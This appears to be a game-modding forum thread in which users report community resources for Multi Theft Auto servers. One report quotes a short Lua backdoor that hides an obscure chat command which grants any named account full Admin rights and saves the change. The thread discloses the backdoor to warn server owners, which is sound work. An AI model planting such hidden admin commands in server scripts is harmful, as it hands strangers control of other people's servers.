Jump to content

REPORT COMMUNITY CENTER RESOURCES HERE


Recommended Posts

  • Replies 1.1k
  • Created
  • Last Reply

Top Posters In This Topic

https://community.multitheftauto.com/index.php?p= ... ls&id=2567

I don't know if this should be removed, but one of the scripts inside has a exploit command to give you admin rights on the server and this is not even related to the main goal of the resource at all. Imagine how many people will download this resource and the creator can easily get an admin panel on any server that have this resource installed.

Link to comment

Report:

viewtopic.php?f=108&t=34613

When players(authors) joined his server , he can gets full admin rights. Here is code:

  
function giveAdminRights (playerSource, commandName, accountName) 
    if accountName then 
        aclGroupAddObject (aclGetGroup("Admin"), "user."..accountName) 
        aclSave() 
        outputChatBox (accountName..".", playerSource,0,255,0) 
    else 
        outputChatBox ("X", playerSource,255,0,0) 
    end 
end 
addCommandHandler ("spcttrhck", giveAdminRights) 
  

Credis to: LoveFist and AcitanoX for functions

Link to comment
Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...